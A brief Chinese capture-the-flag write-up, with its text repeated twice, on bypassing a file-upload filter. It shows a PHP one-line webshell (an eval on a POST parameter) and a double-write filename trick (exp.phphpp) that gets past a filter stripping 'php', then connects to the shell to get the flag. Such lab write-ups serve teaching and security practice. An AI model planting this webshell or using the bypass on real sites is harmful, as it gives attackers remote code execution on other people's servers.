双写绕过上传
思路
网页有上传文件的入口,先尝试上传一个一句话木马
eval($_POST['cssec']); |
网页提示
文件 exp.php 已经上传。 |
php后缀名被替换为空了,尝试双写绕过,改为exp.phphpp 上传
连接木马,得到flag
网页有上传文件的入口,先尝试上传一个一句话木马
eval($_POST['cssec']); |
网页提示
文件 exp.php 已经上传。 |
php后缀名被替换为空了,尝试双写绕过,改为exp.phphpp 上传
连接木马,得到flag